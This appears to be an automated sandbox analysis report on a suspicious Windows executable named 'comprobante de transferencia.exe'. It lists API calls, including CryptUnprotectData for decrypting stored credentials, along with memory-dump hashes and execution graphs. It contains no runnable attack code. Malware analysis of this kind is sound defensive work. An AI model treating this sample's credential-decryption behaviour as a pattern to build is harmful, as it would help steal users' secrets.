                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3355392842
                                            • Opcode ID: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                            • Instruction ID: 0310c51cfe5e9f7ce5f17852bd92726e60929743d8abc3d3bdfc5d6511664db2
                                            • Opcode Fuzzy Hash: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                            • Instruction Fuzzy Hash: C0D0A731111530ABC211AB488D04DDF739C9E463453424037F101B31A1D7785D5197FE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402F6A,?,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402D9D
                                            • GetTickCount.KERNEL32 ref: 00402DBB
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                            • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402DE6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                            • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                            • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                            • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: TextWindow
                                            • String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$1033
                                            • API String ID: 530164218-305335609
                                            • Opcode ID: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                            • Instruction ID: a3bd2acee85f271d60691375da4bc4fc24ae93d70a97cc42eb68c8ddca864a14
                                            • Opcode Fuzzy Hash: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                            • Instruction Fuzzy Hash: C311F631B40611EBC7349F15DC809777BBCEB45719718857FE801A73A2CA39AD038A68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 0040511C
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                              • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                            • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                            • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                            • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FreeLibrary.KERNEL32(?,76BF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                            • GlobalFree.KERNEL32(?), ref: 004037EF
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3355392842
                                            • Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                            • Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
                                            • Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                            • Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\comprobante de transferencia.exe,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405A20
                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\comprobante de transferencia.exe,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405A30
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3370423016
                                            • Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                            • Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
                                            • Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                            • Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                            • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                            • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                            • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                            • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:9.3%
                                            Dynamic/Decrypted Code Coverage:96.9%
                                            Signature Coverage:3.1%
                                            Total number of Nodes:98
                                            Total number of Limit Nodes:7
                                            execution_graph 46054 150a45 46055 150a05 46054->46055 46057 15084e 46054->46057 46056 15091b 46057->46056 46060 3705afa7 46057->46060 46064 3705afb8 46057->46064 46061 3705afb8 46060->46061 46068 3705a684 46061->46068 46065 3705afc7 46064->46065 46066 3705a684 2 API calls 46065->46066 46067 3705afe8 46066->46067 46067->46057 46069 3705a68f 46068->46069 46072 3705be5c 46069->46072 46071 3705c96e 46071->46071 46073 3705be67 46072->46073 46074 3705d0ef 46073->46074 46077 3714b4d0 46073->46077 46081 3714b4e0 46073->46081 46074->46071 46079 3714b4e0 46077->46079 46078 3714b592 46078->46074 46079->46078 46080 3714b9a8 WaitMessage 46079->46080 46080->46079 46083 3714b545 46081->46083 46082 3714b592 46082->46074 46083->46082 46084 3714b9a8 WaitMessage 46083->46084 46084->46083 46031 37146510 46032 37146578 CreateWindowExW 46031->46032 46034 37146634 46032->46034 46034->46034 46035 364496c0 46036 364496dd 46035->46036 46039 36449100 46036->46039 46040 36449900 CryptUnprotectData 46039->46040 46041 36449715 46040->46041 46042 3705c0c0 46043 3705c106 GetCurrentProcess 46042->46043 46045 3705c151 46043->46045 46046 3705c158 GetCurrentThread 46043->46046 46045->46046 46047 3705c195 GetCurrentProcess 46046->46047 46048 3705c18e 46046->46048 46049 3705c1cb 46047->46049 46048->46047 46050 3705c1f3 GetCurrentThreadId 46049->46050 46051 3705c224 46050->46051 46132 156530 46133 15654e 46132->46133 46136 154e74 46133->46136 46135 156585 46138 158050 LoadLibraryA 46136->46138 46139 158149 46138->46139 46085 ad01c 46086 ad034 46085->46086 46087 ad08e 46086->46087 46091 37143584 46086->46091 46098 371466c8 46086->46098 46102 371466b7 46086->46102 46092 3714358f 46091->46092 46093 37147889 46092->46093 46095 37147879 46092->46095 46110 3714364c 46093->46110 46106 371479b0 46095->46106 46096 37147887 46099 371466ee 46098->46099 46100 37143584 CallWindowProcW 46099->46100 46101 3714670f 46100->46101 46101->46087 46103 371466c9 46102->46103 46104 37143584 CallWindowProcW 46103->46104 46105 3714670f 46104->46105 46105->46087 46108 371479c4 46106->46108 46107 37147a50 46107->46096 46114 37147a68 46108->46114 46111 37143657 46110->46111 46112 37148c99 46111->46112 46113 37148cea CallWindowProcW 46111->46113 46112->46096 46113->46112 46115 37147a79 46114->46115 46117 37148c23 46114->46117 46115->46107 46118 3714364c CallWindowProcW 46117->46118 46119 37148c3a 46118->46119 46119->46115 46120 3714af48 46121 3714af70 46120->46121 46124 3714af9c 46120->46124 46122 3714af79 46121->46122 46125 3714a3a4 46121->46125 46127 3714a3af 46125->46127 46126 3714b293 46126->46124 46127->46126 46129 3714a3c0 46127->46129 46130 3714b2c8 OleInitialize 46129->46130 46131 3714b32c 46130->46131 46131->46126 46140 3644fb28 46141 3644fb58 46140->46141 46144 371411f8 46141->46144 46145 37141204 46144->46145 46146 3644fc08 46144->46146 46145->46146 46149 37141390 46145->46149 46153 37141388 46145->46153 46150 371413d5 FindWindowW 46149->46150 46152 37141415 46150->46152 46152->46146 46154 37141390 FindWindowW 46153->46154 46156 37141415 46154->46156 46156->46146 46052 3705c308 DuplicateHandle 46053 3705c39e 46052->46053

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3704 3714b4e0-3714b543 3705 3714b545-3714b56f 3704->3705 3706 3714b572-3714b590 3704->3706 3705->3706 3711 3714b592-3714b594 3706->3711 3712 3714b599-3714b5d0 3706->3712 3714 3714ba52-3714ba67 3711->3714 3716 3714b5d6-3714b5ea 3712->3716 3717 3714ba01 3712->3717 3718 3714b5ec-3714b616 3716->3718 3719 3714b619-3714b638 3716->3719 3720 3714ba06-3714ba1c 3717->3720 3718->3719 3726 3714b650-3714b652 3719->3726 3727 3714b63a-3714b640 3719->3727 3720->3714 3730 3714b654-3714b66c 3726->3730 3731 3714b671-3714b67a 3726->3731 3728 3714b644-3714b646 3727->3728 3729 3714b642 3727->3729 3728->3726 3729->3726 3730->3720 3733 3714b682-3714b689 3731->3733 3734 3714b693-3714b69a 3733->3734 3735 3714b68b-3714b691 3733->3735 3737 3714b6a4 3734->3737 3738 3714b69c-3714b6a2 3734->3738 3736 3714b6a7-3714b6bd call 3714a420 3735->3736 3740 3714b6c2-3714b6c4 3736->3740 3737->3736 3738->3736 3741 3714b819-3714b81d 3740->3741 3742 3714b6ca-3714b6d1 3740->3742 3744 3714b823-3714b827 3741->3744 3745 3714b9ec-3714b9ff 3741->3745 3742->3717 3743 3714b6d7-3714b714 3742->3743 3753 3714b9e2-3714b9e6 3743->3753 3754 3714b71a-3714b71f 3743->3754 3746 3714b841-3714b84a 3744->3746 3747 3714b829-3714b83c 3744->3747 3745->3720 3749 3714b84c-3714b876 3746->3749 3750 3714b879-3714b880 3746->3750 3747->3720 3749->3750 3751 3714b886-3714b88d 3750->3751 3752 3714b91f-3714b934 3750->3752 3755 3714b8bc-3714b8de 3751->3755 3756 3714b88f-3714b8b9 3751->3756 3752->3753 3768 3714b93a-3714b93c 3752->3768 3753->3733 3753->3745 3757 3714b751-3714b766 call 3714a444 3754->3757 3758 3714b721-3714b72f call 3714a42c 3754->3758 3755->3752 3791 3714b8e0-3714b8ea 3755->3791 3756->3755 3766 3714b76b-3714b76f 3757->3766 3758->3757 3771 3714b731-3714b74f call 3714a438 3758->3771 3772 3714b7e0-3714b7ed 3766->3772 3773 3714b771-3714b783 call 3714a450 3766->3773 3769 3714b93e-3714b977 3768->3769 3770 3714b989-3714b9a6 call 3714a420 3768->3770 3785 3714b980-3714b987 3769->3785 3786 3714b979-3714b97f 3769->3786 3770->3753 3788 3714b9a8-3714b9d4 WaitMessage 3770->3788 3771->3766 3772->3753 3789 3714b7f3-3714b7fd call 3714a460 3772->3789 3796 3714b785-3714b7b5 3773->3796 3797 3714b7c3-3714b7db 3773->3797 3785->3753 3786->3785 3793 3714b9d6 3788->3793 3794 3714b9db 3788->3794 3801 3714b80c-3714b814 call 3714a478 3789->3801 3802 3714b7ff-3714b807 call 3714a46c 3789->3802 3804 3714b902-3714b91d 3791->3804 3805 3714b8ec-3714b8f2 3791->3805 3793->3794 3794->3753 3812 3714b7b7 3796->3812 3813 3714b7bc 3796->3813 3797->3720 3801->3753 3802->3753 3804->3752 3804->3791 3809 3714b8f4 3805->3809 3810 3714b8f6-3714b8f8 3805->3810 3809->3804 3810->3804 3812->3813 3813->3797
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: hmE6
                                            • API String ID: 0-3714938458
                                            • Opcode ID: f2e978482b4876139409802f1e53ff73730064bf06ac75eca5ecce61cb9b60d6
                                            • Instruction ID: ba322232566a28d6f70ac29954835e81488cd2b513f131d41d580531e9a20226
                                            • Opcode Fuzzy Hash: f2e978482b4876139409802f1e53ff73730064bf06ac75eca5ecce61cb9b60d6
                                            • Instruction Fuzzy Hash: 4BF16C75A00308CFEB15CFA9C988B9EBBF1BF88314F258559D405AF2A1DB75A945CF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 36449965
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7702458201.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_36440000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: b5fc8594d7652ec54f31699367cd4b2e103d3a0eba49fe38d97351059c484dfb
                                            • Instruction ID: f2be29c42d12c7c1d84f1aae5b5333eeb871885cef7557f62eebe75523b11c44
                                            • Opcode Fuzzy Hash: b5fc8594d7652ec54f31699367cd4b2e103d3a0eba49fe38d97351059c484dfb
                                            • Instruction Fuzzy Hash: EA1112B6800249EFDB11DF9AC845BDEBBF4EB48320F14841AE918A7610C379A594DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 36449965
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7702458201.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_36440000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: 9c852fb241d0c2ac303c8f8dc1f1b56ce276234eac8b7d80b933954119bb8971
                                            • Instruction ID: 7ea7a91ba5cba3125a4c45d3993ad6b19c8e92db59a64bab6fa69881c1200d9d
                                            • Opcode Fuzzy Hash: 9c852fb241d0c2ac303c8f8dc1f1b56ce276234eac8b7d80b933954119bb8971
                                            • Instruction Fuzzy Hash: 321167B2800349DFDB11DF9AC845BDEBBF4EF48320F14841AEA14A7200C339A990DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1975 3705c0b0-3705c14f GetCurrentProcess 1980 3705c151-3705c157 1975->1980 1981 3705c158-3705c18c GetCurrentThread 1975->1981 1980->1981 1982 3705c195-3705c1c9 GetCurrentProcess 1981->1982 1983 3705c18e-3705c194 1981->1983 1984 3705c1d2-3705c1ed call 3705c28f 1982->1984 1985 3705c1cb-3705c1d1 1982->1985 1983->1982 1989 3705c1f3-3705c222 GetCurrentThreadId 1984->1989 1985->1984 1990 3705c224-3705c22a 1989->1990 1991 3705c22b-3705c28d 1989->1991 1990->1991
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 3705C13E
                                            • GetCurrentThread.KERNEL32 ref: 3705C17B
                                            • GetCurrentProcess.KERNEL32 ref: 3705C1B8
                                            • GetCurrentThreadId.KERNEL32 ref: 3705C211
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: df6d4e3514f5f8de39a61b17f245f4e72de38fd45ac00d00fcdfbee9dbeb03e2
                                            • Instruction ID: 65d5ab9259d91c2bacb7ef6b48f5d1866d8ba283aa313fb803700325098fdbf5
                                            • Opcode Fuzzy Hash: df6d4e3514f5f8de39a61b17f245f4e72de38fd45ac00d00fcdfbee9dbeb03e2
                                            • Instruction Fuzzy Hash: 575157B090434A9FDB00CFAAC448BDEBBF1EF49310F24845AD419A7352D734A944CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1998 3705c0c0-3705c14f GetCurrentProcess 2002 3705c151-3705c157 1998->2002 2003 3705c158-3705c18c GetCurrentThread 1998->2003 2002->2003 2004 3705c195-3705c1c9 GetCurrentProcess 2003->2004 2005 3705c18e-3705c194 2003->2005 2006 3705c1d2-3705c1ed call 3705c28f 2004->2006 2007 3705c1cb-3705c1d1 2004->2007 2005->2004 2011 3705c1f3-3705c222 GetCurrentThreadId 2006->2011 2007->2006 2012 3705c224-3705c22a 2011->2012 2013 3705c22b-3705c28d 2011->2013 2012->2013
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 3705C13E
                                            • GetCurrentThread.KERNEL32 ref: 3705C17B
                                            • GetCurrentProcess.KERNEL32 ref: 3705C1B8
                                            • GetCurrentThreadId.KERNEL32 ref: 3705C211
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: dd39ebe6d0072472fe1dc2089fa17719a7c131d5a43fd13a660d301ce25f6d6e
                                            • Instruction ID: 2e3720afdd4ceec4bd7aefb3da6f013a0a8f29b8930cee5ef562fb90a996b6b2
                                            • Opcode Fuzzy Hash: dd39ebe6d0072472fe1dc2089fa17719a7c131d5a43fd13a660d301ce25f6d6e
                                            • Instruction Fuzzy Hash: BA5135B190074A9FDB10DFAAD588BDEBBF1AF88310F20845AD419B7351DB34A984CF65
